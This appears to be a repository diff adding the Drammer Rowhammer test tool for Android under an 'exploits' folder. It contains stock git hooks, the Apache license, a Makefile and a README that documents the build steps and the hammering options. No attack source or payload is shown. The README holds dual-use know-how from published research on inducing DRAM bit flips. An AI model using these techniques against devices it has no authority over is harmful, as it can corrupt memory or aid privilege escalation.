  3 +# Copyright (c) 2006, 2008 Junio C Hamano
  4 +#
  5 +# The "pre-rebase" hook is run just before "git rebase" starts doing
  6 +# its job, and can prevent the command from running by exiting with
  7 +# non-zero status.
  8 +#
  9 +# The hook is called with the following parameters:
  10 +#
  11 +# $1 -- the upstream the series was forked from.
  12 +# $2 -- the branch being rebased (or empty when rebasing the current branch).
  13 +#
  14 +# This sample shows how to prevent topic branches that are already
  15 +# merged to 'next' branch from getting rebased, because allowing it
  16 +# would result in rebasing already published history.
  17 +
  18 +publish=next
  19 +basebranch="$1"
  20 +if test "$#" = 2
  21 +then
  22 + topic="refs/heads/$2"
  23 +else
  24 + topic=`git symbolic-ref HEAD` ||
  25 + exit 0 ;# we do not interrupt rebasing detached HEAD
  26 +fi
  27 +
  28 +case "$topic" in
  29 +refs/heads/??/*)
  30 + ;;
  31 +*)
  32 + exit 0 ;# we do not interrupt others.
  33 + ;;
  34 +esac
  35 +
  36 +# Now we are dealing with a topic branch being rebased
  37 +# on top of master. Is it OK to rebase it?
  38 +
  39 +# Does the topic really exist?
  40 +git show-ref -q "$topic" || {
  41 + echo >&2 "No such branch $topic"
  42 + exit 1
  43 +}
  44 +
  45 +# Is topic fully merged to master?
  46 +not_in_master=`git rev-list --pretty=oneline ^master "$topic"`
  47 +if test -z "$not_in_master"
  48 +then
  49 + echo >&2 "$topic is fully merged to master; better remove it."
  50 + exit 1 ;# we could allow it, but there is no point.
  51 +fi
  52 +
  53 +# Is topic ever merged to next? If so you should not be rebasing it.
  54 +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort`
  55 +only_next_2=`git rev-list ^master ${publish} | sort`
  56 +if test "$only_next_1" = "$only_next_2"
  57 +then
  58 + not_in_topic=`git rev-list "^$topic" master`
  59 + if test -z "$not_in_topic"
  60 + then
  61 + echo >&2 "$topic is already up-to-date with master"
  62 + exit 1 ;# we could allow it, but there is no point.
  63 + else
  64 + exit 0
  65 + fi
  66 +else
  67 + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"`
  68 + /usr/bin/perl -e '
  69 + my $topic = $ARGV[0];
  70 + my $msg = "* $topic has commits already merged to public branch:\n";
  71 + my (%not_in_next) = map {
  72 + /^([0-9a-f]+) /;
  73 + ($1 => 1);
  74 + } split(/\n/, $ARGV[1]);
  75 + for my $elem (map {
  76 + /^([0-9a-f]+) (.*)$/;
  77 + [$1 => $2];
  78 + } split(/\n/, $ARGV[2])) {
  79 + if (!exists $not_in_next{$elem->[0]}) {
  80 + if ($msg) {
  81 + print STDERR $msg;
  82 + undef $msg;
  83 + }
  84 + print STDERR " $elem->[1]\n";
  85 + }
  86 + }
  87 + ' "$topic" "$not_in_next" "$not_in_master"
  88 + exit 1
  89 +fi
  90 +
  91 +<<\DOC_END
  92 +
  93 +This sample hook safeguards topic branches that have been
  94 +published from being rewound.
  95 +
  96 +The workflow assumed here is:
  97 +
  98 + * Once a topic branch forks from "master", "master" is never
  99 + merged into it again (either directly or indirectly).
  100 +
  101 + * Once a topic branch is fully cooked and merged into "master",
  102 + it is deleted. If you need to build on top of it to correct
  103 + earlier mistakes, a new topic branch is created by forking at
  104 + the tip of the "master". This is not strictly necessary, but
  105 + it makes it easier to keep your history simple.
  106 +
  107 + * Whenever you need to test or publish your changes to topic
  108 + branches, merge them into "next" branch.
  109 +
  110 +The script, being an example, hardcodes the publish branch name
  111 +to be "next", but it is trivial to make it configurable via
  112 +$GIT_DIR/config mechanism.
  113 +
  114 +With this workflow, you would want to know:
  115 +
  116 +(1) ... if a topic branch has ever been merged to "next". Young
  117 + topic branches can have stupid mistakes you would rather
  118 + clean up before publishing, and things that have not been
  119 + merged into other branches can be easily rebased without
  120 + affecting other people. But once it is published, you would
  121 + not want to rewind it.
  122 +
  123 +(2) ... if a topic branch has been fully merged to "master".
  124 + Then you can delete it. More importantly, you should not
  125 + build on top of it -- other people may already want to
  126 + change things related to the topic as patches against your
  127 + "master", so if you need further changes, it is better to
  128 + fork the topic (perhaps with the same name) afresh from the
  129 + tip of "master".
  130 +
  131 +Let's look at this example:
  132 +
  133 + o---o---o---o---o---o---o---o---o---o "next"
  134 + / / / /
  135 + / a---a---b A / /
  136 + / / / /
  137 + / / c---c---c---c B /
  138 + / / / \ /
  139 + / / / b---b C \ /
  140 + / / / / \ /
  141 + ---o---o---o---o---o---o---o---o---o---o---o "master"
  142 +
  143 +
  144 +A, B and C are topic branches.
  145 +
  146 + * A has one fix since it was merged up to "next".
  147 +
  148 + * B has finished. It has been fully merged up to "master" and "next",
  149 + and is ready to be deleted.
  150 +
  151 + * C has not merged to "next" at all.
  152 +
  153 +We would want to allow C to be rebased, refuse A, and encourage
  154 +B to be deleted.
  155 +
  156 +To compute (1):
  157 +
  158 + git rev-list ^master ^topic next
  159 + git rev-list ^master next
  160 +
  161 + if these match, topic has not merged in next at all.
  162 +
  163 +To compute (2):
  164 +
  165 + git rev-list master..topic
  166 +
  167 + if this is empty, it is fully merged to "master".
  168 +
  169 +DOC_END
... ...
exploits/drammer/.git-disabled/hooks/prepare-commit-msg.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/hooks/prepare-commit-msg.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to prepare the commit log message.
  4 +# Called by "git commit" with the name of the file that has the
  5 +# commit message, followed by the description of the commit
  6 +# message's source. The hook's purpose is to edit the commit
  7 +# message file. If the hook fails with a non-zero status,
  8 +# the commit is aborted.
  9 +#
  10 +# To enable this hook, rename this file to "prepare-commit-msg".
  11 +
  12 +# This hook includes three examples. The first comments out the
  13 +# "Conflicts:" part of a merge commit.
  14 +#
  15 +# The second includes the output of "git diff --name-status -r"
  16 +# into the message, just before the "git status" output. It is
  17 +# commented because it doesn't cope with --amend or with squashed
  18 +# commits.
  19 +#
  20 +# The third example adds a Signed-off-by line to the message, that can
  21 +# still be edited. This is rarely a good idea.
  22 +
  23 +case "$2,$3" in
  24 + merge,)
  25 + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;;
  26 +
  27 +# ,|template,)
  28 +# /usr/bin/perl -i.bak -pe '
  29 +# print "\n" . `git diff --cached --name-status -r`
  30 +# if /^#/ && $first++ == 0' "$1" ;;
  31 +
  32 + *) ;;
  33 +esac
  34 +
  35 +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p')
  36 +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1"
... ...
exploits/drammer/.git-disabled/hooks/update.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/hooks/update.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to block unannotated tags from entering.
  4 +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new
  5 +#
  6 +# To enable this hook, rename this file to "update".
  7 +#
  8 +# Config
  9 +# ------
  10 +# hooks.allowunannotated
  11 +# This boolean sets whether unannotated tags will be allowed into the
  12 +# repository. By default they won't be.
  13 +# hooks.allowdeletetag
  14 +# This boolean sets whether deleting tags will be allowed in the
  15 +# repository. By default they won't be.
  16 +# hooks.allowmodifytag
  17 +# This boolean sets whether a tag may be modified after creation. By default
  18 +# it won't be.
  19 +# hooks.allowdeletebranch
  20 +# This boolean sets whether deleting branches will be allowed in the
  21 +# repository. By default they won't be.
  22 +# hooks.denycreatebranch
  23 +# This boolean sets whether remotely creating branches will be denied
  24 +# in the repository. By default this is allowed.
  25 +#
  26 +
  27 +# --- Command line
  28 +refname="$1"
  29 +oldrev="$2"
  30 +newrev="$3"
  31 +
  32 +# --- Safety check
  33 +if [ -z "$GIT_DIR" ]; then
  34 + echo "Don't run this script from the command line." >&2
  35 + echo " (if you want, you could supply GIT_DIR then run" >&2
  36 + echo " $0 <ref> <oldrev> <newrev>)" >&2
  37 + exit 1
  38 +fi
  39 +
  40 +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then
  41 + echo "usage: $0 <ref> <oldrev> <newrev>" >&2
  42 + exit 1
  43 +fi
  44 +
  45 +# --- Config
  46 +allowunannotated=$(git config --bool hooks.allowunannotated)
  47 +allowdeletebranch=$(git config --bool hooks.allowdeletebranch)
  48 +denycreatebranch=$(git config --bool hooks.denycreatebranch)
  49 +allowdeletetag=$(git config --bool hooks.allowdeletetag)
  50 +allowmodifytag=$(git config --bool hooks.allowmodifytag)
  51 +
  52 +# check for no description
  53 +projectdesc=$(sed -e '1q' "$GIT_DIR/description")
  54 +case "$projectdesc" in
  55 +"Unnamed repository"* | "")
  56 + echo "*** Project description file hasn't been set" >&2
  57 + exit 1
  58 + ;;
  59 +esac
  60 +
  61 +# --- Check types
  62 +# if $newrev is 0000...0000, it's a commit to delete a ref.
  63 +zero="0000000000000000000000000000000000000000"
  64 +if [ "$newrev" = "$zero" ]; then
  65 + newrev_type=delete
  66 +else
  67 + newrev_type=$(git cat-file -t $newrev)
  68 +fi
  69 +
  70 +case "$refname","$newrev_type" in
  71 + refs/tags/*,commit)
  72 + # un-annotated tag
  73 + short_refname=${refname##refs/tags/}
  74 + if [ "$allowunannotated" != "true" ]; then
  75 + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2
  76 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2
  77 + exit 1
  78 + fi
  79 + ;;
  80 + refs/tags/*,delete)
  81 + # delete tag
  82 + if [ "$allowdeletetag" != "true" ]; then
  83 + echo "*** Deleting a tag is not allowed in this repository" >&2
  84 + exit 1
  85 + fi
  86 + ;;
  87 + refs/tags/*,tag)
  88 + # annotated tag
  89 + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1
  90 + then
  91 + echo "*** Tag '$refname' already exists." >&2
  92 + echo "*** Modifying a tag is not allowed in this repository." >&2
  93 + exit 1
  94 + fi
  95 + ;;
  96 + refs/heads/*,commit)
  97 + # branch
  98 + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then
  99 + echo "*** Creating a branch is not allowed in this repository" >&2
  100 + exit 1
  101 + fi
  102 + ;;
  103 + refs/heads/*,delete)
  104 + # delete branch
  105 + if [ "$allowdeletebranch" != "true" ]; then
  106 + echo "*** Deleting a branch is not allowed in this repository" >&2
  107 + exit 1
  108 + fi
  109 + ;;
  110 + refs/remotes/*,commit)
  111 + # tracking branch
  112 + ;;
  113 + refs/remotes/*,delete)
  114 + # delete tracking branch
  115 + if [ "$allowdeletebranch" != "true" ]; then
  116 + echo "*** Deleting a tracking branch is not allowed in this repository" >&2
  117 + exit 1
  118 + fi
  119 + ;;
  120 + *)
  121 + # Anything else (is there anything else?)
  122 + echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2
  123 + exit 1
  124 + ;;
  125 +esac
  126 +
  127 +# --- Finished
  128 +exit 0
... ...
exploits/drammer/.git-disabled/index 0 → 100644
View file @1d685ae
No preview for this file type
exploits/drammer/.git-disabled/info/exclude 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/info/exclude
  1 +# git ls-files --others --exclude-from=.git/info/exclude
  2 +# Lines that start with '#' are comments.
  3 +# For a project mostly in C, the following would be a good set of
  4 +# exclude patterns (uncomment them if you want to use them):
  5 +# *.[oa]
  6 +# *~
... ...
exploits/drammer/.git-disabled/logs/HEAD 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/logs/HEAD
  1 +0000000000000000000000000000000000000000 4c5ef24f03eff0280c38c911ce2e94f16d026961 Imanol-Mikel Barba Sabariego <imanol@imanolbarba.net> 1495477918 +0200 clone: from https://github.com/vusec/drammer
... ...
exploits/drammer/.git-disabled/logs/refs/heads/master 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/logs/refs/heads/master
  1 +0000000000000000000000000000000000000000 4c5ef24f03eff0280c38c911ce2e94f16d026961 Imanol-Mikel Barba Sabariego <imanol@imanolbarba.net> 1495477918 +0200 clone: from https://github.com/vusec/drammer
... ...
exploits/drammer/.git-disabled/logs/refs/remotes/origin/HEAD 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/logs/refs/remotes/origin/HEAD
  1 +0000000000000000000000000000000000000000 4c5ef24f03eff0280c38c911ce2e94f16d026961 Imanol-Mikel Barba Sabariego <imanol@imanolbarba.net> 1495477918 +0200 clone: from https://github.com/vusec/drammer
... ...
exploits/drammer/.git-disabled/objects/pack/pack-b2474f6460709f7ba0c1974e8f2314e867abdb5b.idx 0 → 100644
View file @1d685ae
No preview for this file type
exploits/drammer/.git-disabled/objects/pack/pack-b2474f6460709f7ba0c1974e8f2314e867abdb5b.pack 0 → 100644
View file @1d685ae
No preview for this file type
exploits/drammer/.git-disabled/packed-refs 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/packed-refs
  1 +# pack-refs with: peeled fully-peeled
  2 +d17e333b076830f404e203a2b45aad3b172043f1 refs/remotes/origin/geometry
  3 +4c5ef24f03eff0280c38c911ce2e94f16d026961 refs/remotes/origin/master
... ...
exploits/drammer/.git-disabled/refs/heads/master 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/refs/heads/master
  1 +4c5ef24f03eff0280c38c911ce2e94f16d026961
... ...
exploits/drammer/.git-disabled/refs/remotes/origin/HEAD 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/refs/remotes/origin/HEAD
  1 +ref: refs/remotes/origin/master
... ...
exploits/drammer/.gitignore 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/.gitignore
  1 +*.o
  2 +rh-test
... ...
exploits/drammer/LICENSE-2.0.txt 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/LICENSE-2.0.txt
  1 +
  2 + Apache License
  3 + Version 2.0, January 2004
  4 + http://www.apache.org/licenses/
  5 +
  6 + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
  7 +
  8 + 1. Definitions.
  9 +
  10 + "License" shall mean the terms and conditions for use, reproduction,
  11 + and distribution as defined by Sections 1 through 9 of this document.
  12 +
  13 + "Licensor" shall mean the copyright owner or entity authorized by
  14 + the copyright owner that is granting the License.
  15 +
  16 + "Legal Entity" shall mean the union of the acting entity and all
  17 + other entities that control, are controlled by, or are under common
  18 + control with that entity. For the purposes of this definition,
  19 + "control" means (i) the power, direct or indirect, to cause the
  20 + direction or management of such entity, whether by contract or
  21 + otherwise, or (ii) ownership of fifty percent (50%) or more of the
  22 + outstanding shares, or (iii) beneficial ownership of such entity.
  23 +
  24 + "You" (or "Your") shall mean an individual or Legal Entity
  25 + exercising permissions granted by this License.
  26 +
  27 + "Source" form shall mean the preferred form for making modifications,
  28 + including but not limited to software source code, documentation
  29 + source, and configuration files.
  30 +
  31 + "Object" form shall mean any form resulting from mechanical
  32 + transformation or translation of a Source form, including but
  33 + not limited to compiled object code, generated documentation,
  34 + and conversions to other media types.
  35 +
  36 + "Work" shall mean the work of authorship, whether in Source or
  37 + Object form, made available under the License, as indicated by a
  38 + copyright notice that is included in or attached to the work
  39 + (an example is provided in the Appendix below).
  40 +
  41 + "Derivative Works" shall mean any work, whether in Source or Object
  42 + form, that is based on (or derived from) the Work and for which the
  43 + editorial revisions, annotations, elaborations, or other modifications
  44 + represent, as a whole, an original work of authorship. For the purposes
  45 + of this License, Derivative Works shall not include works that remain
  46 + separable from, or merely link (or bind by name) to the interfaces of,
  47 + the Work and Derivative Works thereof.
  48 +
  49 + "Contribution" shall mean any work of authorship, including
  50 + the original version of the Work and any modifications or additions
  51 + to that Work or Derivative Works thereof, that is intentionally
  52 + submitted to Licensor for inclusion in the Work by the copyright owner
  53 + or by an individual or Legal Entity authorized to submit on behalf of
  54 + the copyright owner. For the purposes of this definition, "submitted"
  55 + means any form of electronic, verbal, or written communication sent
  56 + to the Licensor or its representatives, including but not limited to
  57 + communication on electronic mailing lists, source code control systems,
  58 + and issue tracking systems that are managed by, or on behalf of, the
  59 + Licensor for the purpose of discussing and improving the Work, but
  60 + excluding communication that is conspicuously marked or otherwise
  61 + designated in writing by the copyright owner as "Not a Contribution."
  62 +
  63 + "Contributor" shall mean Licensor and any individual or Legal Entity
  64 + on behalf of whom a Contribution has been received by Licensor and
  65 + subsequently incorporated within the Work.
  66 +
  67 + 2. Grant of Copyright License. Subject to the terms and conditions of
  68 + this License, each Contributor hereby grants to You a perpetual,
  69 + worldwide, non-exclusive, no-charge, royalty-free, irrevocable
  70 + copyright license to reproduce, prepare Derivative Works of,
  71 + publicly display, publicly perform, sublicense, and distribute the
  72 + Work and such Derivative Works in Source or Object form.
  73 +
  74 + 3. Grant of Patent License. Subject to the terms and conditions of
  75 + this License, each Contributor hereby grants to You a perpetual,
  76 + worldwide, non-exclusive, no-charge, royalty-free, irrevocable
  77 + (except as stated in this section) patent license to make, have made,
  78 + use, offer to sell, sell, import, and otherwise transfer the Work,
  79 + where such license applies only to those patent claims licensable
  80 + by such Contributor that are necessarily infringed by their
  81 + Contribution(s) alone or by combination of their Contribution(s)
  82 + with the Work to which such Contribution(s) was submitted. If You
  83 + institute patent litigation against any entity (including a
  84 + cross-claim or counterclaim in a lawsuit) alleging that the Work
  85 + or a Contribution incorporated within the Work constitutes direct
  86 + or contributory patent infringement, then any patent licenses
  87 + granted to You under this License for that Work shall terminate
  88 + as of the date such litigation is filed.
  89 +
  90 + 4. Redistribution. You may reproduce and distribute copies of the
  91 + Work or Derivative Works thereof in any medium, with or without
  92 + modifications, and in Source or Object form, provided that You
  93 + meet the following conditions:
  94 +
  95 + (a) You must give any other recipients of the Work or
  96 + Derivative Works a copy of this License; and
  97 +
  98 + (b) You must cause any modified files to carry prominent notices
  99 + stating that You changed the files; and
  100 +
  101 + (c) You must retain, in the Source form of any Derivative Works
  102 + that You distribute, all copyright, patent, trademark, and
  103 + attribution notices from the Source form of the Work,
  104 + excluding those notices that do not pertain to any part of
  105 + the Derivative Works; and
  106 +
  107 + (d) If the Work includes a "NOTICE" text file as part of its
  108 + distribution, then any Derivative Works that You distribute must
  109 + include a readable copy of the attribution notices contained
  110 + within such NOTICE file, excluding those notices that do not
  111 + pertain to any part of the Derivative Works, in at least one
  112 + of the following places: within a NOTICE text file distributed
  113 + as part of the Derivative Works; within the Source form or
  114 + documentation, if provided along with the Derivative Works; or,
  115 + within a display generated by the Derivative Works, if and
  116 + wherever such third-party notices normally appear. The contents
  117 + of the NOTICE file are for informational purposes only and
  118 + do not modify the License. You may add Your own attribution
  119 + notices within Derivative Works that You distribute, alongside
  120 + or as an addendum to the NOTICE text from the Work, provided
  121 + that such additional attribution notices cannot be construed
  122 + as modifying the License.
  123 +
  124 + You may add Your own copyright statement to Your modifications and
  125 + may provide additional or different license terms and conditions
  126 + for use, reproduction, or distribution of Your modifications, or
  127 + for any such Derivative Works as a whole, provided Your use,
  128 + reproduction, and distribution of the Work otherwise complies with
  129 + the conditions stated in this License.
  130 +
  131 + 5. Submission of Contributions. Unless You explicitly state otherwise,
  132 + any Contribution intentionally submitted for inclusion in the Work
  133 + by You to the Licensor shall be under the terms and conditions of
  134 + this License, without any additional terms or conditions.
  135 + Notwithstanding the above, nothing herein shall supersede or modify
  136 + the terms of any separate license agreement you may have executed
  137 + with Licensor regarding such Contributions.
  138 +
  139 + 6. Trademarks. This License does not grant permission to use the trade
  140 + names, trademarks, service marks, or product names of the Licensor,
  141 + except as required for reasonable and customary use in describing the
  142 + origin of the Work and reproducing the content of the NOTICE file.
  143 +
  144 + 7. Disclaimer of Warranty. Unless required by applicable law or
  145 + agreed to in writing, Licensor provides the Work (and each
  146 + Contributor provides its Contributions) on an "AS IS" BASIS,
  147 + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
  148 + implied, including, without limitation, any warranties or conditions
  149 + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
  150 + PARTICULAR PURPOSE. You are solely responsible for determining the
  151 + appropriateness of using or redistributing the Work and assume any
  152 + risks associated with Your exercise of permissions under this License.
  153 +
  154 + 8. Limitation of Liability. In no event and under no legal theory,
  155 + whether in tort (including negligence), contract, or otherwise,
  156 + unless required by applicable law (such as deliberate and grossly
  157 + negligent acts) or agreed to in writing, shall any Contributor be
  158 + liable to You for damages, including any direct, indirect, special,
  159 + incidental, or consequential damages of any character arising as a
  160 + result of this License or out of the use or inability to use the
  161 + Work (including but not limited to damages for loss of goodwill,
  162 + work stoppage, computer failure or malfunction, or any and all
  163 + other commercial damages or losses), even if such Contributor
  164 + has been advised of the possibility of such damages.
  165 +
  166 + 9. Accepting Warranty or Additional Liability. While redistributing
  167 + the Work or Derivative Works thereof, You may choose to offer,
  168 + and charge a fee for, acceptance of support, warranty, indemnity,
  169 + or other liability obligations and/or rights consistent with this
  170 + License. However, in accepting such obligations, You may act only
  171 + on Your own behalf and on Your sole responsibility, not on behalf
  172 + of any other Contributor, and only if You agree to indemnify,
  173 + defend, and hold each Contributor harmless for any liability
  174 + incurred by, or claims asserted against, such Contributor by reason
  175 + of your accepting any such warranty or additional liability.
  176 +
  177 + END OF TERMS AND CONDITIONS
  178 +
  179 + APPENDIX: How to apply the Apache License to your work.
  180 +
  181 + To apply the Apache License to your work, attach the following
  182 + boilerplate notice, with the fields enclosed by brackets "[]"
  183 + replaced with your own identifying information. (Don't include
  184 + the brackets!) The text should be enclosed in the appropriate
  185 + comment syntax for the file format. We also recommend that a
  186 + file or class name and description of purpose be included on the
  187 + same "printed page" as the copyright notice for easier
  188 + identification within third-party archives.
  189 +
  190 + Copyright [yyyy] [name of copyright owner]
  191 +
  192 + Licensed under the Apache License, Version 2.0 (the "License");
  193 + you may not use this file except in compliance with the License.
  194 + You may obtain a copy of the License at
  195 +
  196 + http://www.apache.org/licenses/LICENSE-2.0
  197 +
  198 + Unless required by applicable law or agreed to in writing, software
  199 + distributed under the License is distributed on an "AS IS" BASIS,
  200 + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  201 + See the License for the specific language governing permissions and
  202 + limitations under the License.
... ...
exploits/drammer/Makefile 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/Makefile
  1 +##
  2 + # Copyright 2016, Victor van der Veen
  3 + #
  4 + # Licensed under the Apache License, Version 2.0 (the "License");
  5 + # you may not use this file except in compliance with the License.
  6 + # You may obtain a copy of the License at
  7 + #
  8 + # http://www.apache.org/licenses/LICENSE-2.0
  9 + #
  10 + # Unless required by applicable law or agreed to in writing, software
  11 + # distributed under the License is distributed on an "AS IS" BASIS,
  12 + # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13 + # See the License for the specific language governing permissions and
  14 + # limitations under the License.
  15 + ##
  16 +
  17 +STANDALONE_TOOLCHAIN ?= /home/imanol/devel/android-ndk/toolchains/default-arm-toolchain/prebuilt/linux-x86_64/bin
  18 +#$(HOME)/src/android-ndk-r11c/sysroot-arm/bin
  19 +
  20 +CC = $(STANDALONE_TOOLCHAIN)/arm-linux-androideabi-gcc
  21 +CXX = $(STANDALONE_TOOLCHAIN)/arm-linux-androideabi-g++
  22 +CPP = $(STANDALONE_TOOLCHAIN)/arm-linux-androideabi-g++
  23 +STRIP = $(STANDALONE_TOOLCHAIN)/arm-linux-androideabi-strip
  24 +
  25 +CPPFLAGS = -std=c++11 -O3 -Wall
  26 +LDFLAGS = -pthread -static
  27 +INCLUDES = -I$(PWD)/../include
  28 +
  29 +TMPDIR = /data/local/tmp/
  30 +TARGET ?= rh-test
  31 +
  32 +all: $(TARGET)
  33 +
  34 +rh-test: rh-test.o ion.o rowsize.o templating.o massage.o
  35 + $(CPP) $(CPPFLAGS) -o $@ $^ $(LDFLAGS)
  36 + $(STRIP) $@
  37 +
  38 +%.o: %.cc
  39 + $(CPP) $(CPPFLAGS) $(INCLUDES) -c -o $@ $<
  40 +
  41 +install:
  42 + make all
  43 + adb push $(TARGET) $(TMPDIR)
  44 + adb shell chmod 755 $(TMPDIR)$(TARGET)
  45 +
  46 +clean:
  47 + rm -f $(TARGET) *.o a.out
  48 +
  49 +upload:
  50 + scp rh-test vvdveen.com:/home/vvdveen/www/drammer/rh-test
  51 +
  52 +
  53 +reboot:
  54 + adb reboot
  55 +
  56 +test:
  57 + adb shell "$(TMPDIR)$(TARGET) -f/data/local/tmp/out.txt"
... ...
exploits/drammer/README.md 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/README.md
  1 +# Drammer
  2 +This software is the open-source component of our paper "Drammer: Deterministic
  3 +Rowhammer Attacks on Mobile Devices", published in ACM Computer and
  4 +Communications Security (CCS) 2016. It allows you to test whether an Android
  5 +device is vulnerable to the Rowhammer bug. It does **not** allow you to root
  6 +your device.
  7 +
  8 +This code base contains our *native*, C/C++-based mobile Rowhammer
  9 +test implementation.
  10 +
  11 +# Disclaimer
  12 +If, for some weird reason, you think running this code broke your device, you
  13 +get to keep both pieces.
  14 +
  15 +# Android GUI app
  16 +If you don't want to build the test yourself, we also provide an
  17 +[Android app](https://vvdveen.com/drammer/drammer.apk) as a GUI for the native
  18 +component that may or may not be currently available on the
  19 +[Google Play Store](https://play.google.com/store/apps/details?id=org.iseclab.drammer)
  20 +depending on the store's policy.
  21 +
  22 +The app supports *relaxed* and *aggressive* hammering, which corresponds to the
  23 +number of seconds to run 'defrag' (-d command line option described below): you
  24 +can choose a timeout between 0 (no defrag) and 60 seconds, although higher
  25 +timeouts likely cause the app to become unresponsive.
  26 +
  27 +The app optionally collects basic statistics on the type of device and test
  28 +results so that we can gain insights into the number and type of vulnerable
  29 +devices in the wild, so please consider sharing them for science.
  30 +
  31 +# Native installation
  32 +To build the native binary, you need an Android NDK toolchain. I used
  33 +android-ndk-r11c:
  34 +
  35 + wget https://dl.google.com/android/repository/android-ndk-r11c-linux-x86_64.zip
  36 + unzip android-ndk-r11c-linux-x86_64.zip
  37 + cd android-ndk-r11c
  38 + ./build/tools/make-standalone-toolchain.sh --ndk-dir=`pwd` \
  39 + --arch=arm --platform=android-24 \
  40 + --install-dir=./sysroot-arm/ \
  41 + --verbose
  42 +
  43 +You can then build the program setting `STANDALONE_TOOLCHAIN` variable to point
  44 +to the toolchain:
  45 +
  46 + STANDALONE_TOOLCHAIN=path/to/android-ndk-r11c/sysroot-arm/bin make
  47 +
  48 +This gives you a stripped ARMv7 binary that you can run on both ARMv7 (32-bit)
  49 +and ARMv8 (64-bit) devices. The Makefile provides an install feature that uses
  50 +the Android Debug Bridge (adb) to push the binary to your device's
  51 +/data/local/tmp/ directory. You can install adb by doing a `sudo apt-get install
  52 +android-tools-adb` (on Ubuntu) or by installing the Android SDK via
  53 +[android.com](https://developer.android.com/studio/index.html#downloads). Then
  54 +do a:
  55 +
  56 + make install
  57 + make test
  58 +
  59 +to install and start the Rowhammer test binary. Once installed, you may also
  60 +invoke it from the shell directly:
  61 +
  62 + adb shell
  63 + cd /data/local/tmp
  64 + ./rh-test
  65 +
  66 +## Command line options
  67 +The native binary provides a number of command line options:
  68 +
  69 +* *-a*
  70 + Do templating with all patterns. Without this option, only the patterns *010*
  71 + and *101* are used, meaning that we hammer each row twice: once with it's
  72 + aggressor rows containing all zeros while the victim row holds only ones, and
  73 + once with the aggressor rows holding ones while the victim consists of zeros
  74 + only. Enabling this option hammers each row with the following configurations:
  75 + *000*, *001*, *010*, *011*, *100*, *101*, *110*, *111*, *00r*, *0r0*, *0rr*,
  76 + *r00*, *r0r*, *rr0*, *rrr* (where *r* is random and changed every 100
  77 + iterations).
  78 +
  79 +- *-c <number>*
  80 + Number of memory accesses per hammer round, defaults to 1000000. It is
  81 + said that 2500000 yields the most flips.
  82 +
  83 +- *-d <seconds>*
  84 + Number of seconds to run 'defrag' (disabled by default). This tricks the
  85 + system into freeing more ION memory that can be used for templating. Since
  86 + Android tries to keep as many background processes in memory as possible, the
  87 + amount of memory available for ION allocations may be very small (all of the
  88 + memory is either in use, or cached in the operating system). By allocating
  89 + many ION chunks, this option forces Android's low memory killer to kill
  90 + background processes, giving us more (contiguous) memory to hammer in the
  91 + templating phase.
  92 + Use this option with caution: setting it too high likely hangs your device and
  93 + trigger a reboot. My advice is to first try without *-d* (or with *-d0*), see
  94 + how much memory you get, if not enough, hit `CTRL^C`, and restart with *-d3*.
  95 + If this still does not give you enough memory, I usually repeat the sequence
  96 + of breaking with `CTRL^C` and restarting with *-d3* again in favor of using a
  97 + higher timeout value. To answer the question of "how much is enough": on a
  98 + Nexus 5, that comes with 2GB of memory, you should be able to get 400 to 600
  99 + MB of ION memory.
  100 +
  101 +- *-f <file path>*
  102 + Write results not only to stdout but also to this file.
  103 +
  104 +- *-h*
  105 + Dump the help screen.
  106 +
  107 +- *-i*
  108 + Run an ION heap-type detector function.
  109 +
  110 +- *-q <cpu>*
  111 + Pin the program to this CPU. Some big.LITTLE architectures require you to pin
  112 + the program to a big core, to make sure memory accesses are as fast as
  113 + possible.
  114 +
  115 +- *-r <bytes>*
  116 + The rowsize in bytes. If this value is not provided, the program tries to find
  117 + it using a timing side-channel (described in the paper) which may not always
  118 + work. The most common value seems to be 65536 (64KB).
  119 +
  120 +- *-s*
  121 + Hammer more conservatively. By default, we hammer each page, but this option
  122 + moves less bytes (currently set to 64 bytes).
  123 +
  124 +- *-t <seconds>*
  125 + Stop hammering after this many seconds. The default behavior is to hammer all
  126 + memory that we were able to allocate.
  127 +
  128 +## Description of source files
  129 +The native code base is written in C and abuses some C++ functionality. There
  130 +are some comments in the source files that, combined with run-time output dumped
  131 +on stdout, should give you an indication of what is happening. The main output
  132 +of a run consists of numbers that indicate the average DRAM access time (in
  133 +nanoseconds).
  134 +
  135 +What follows is a short description of all source files.
  136 +
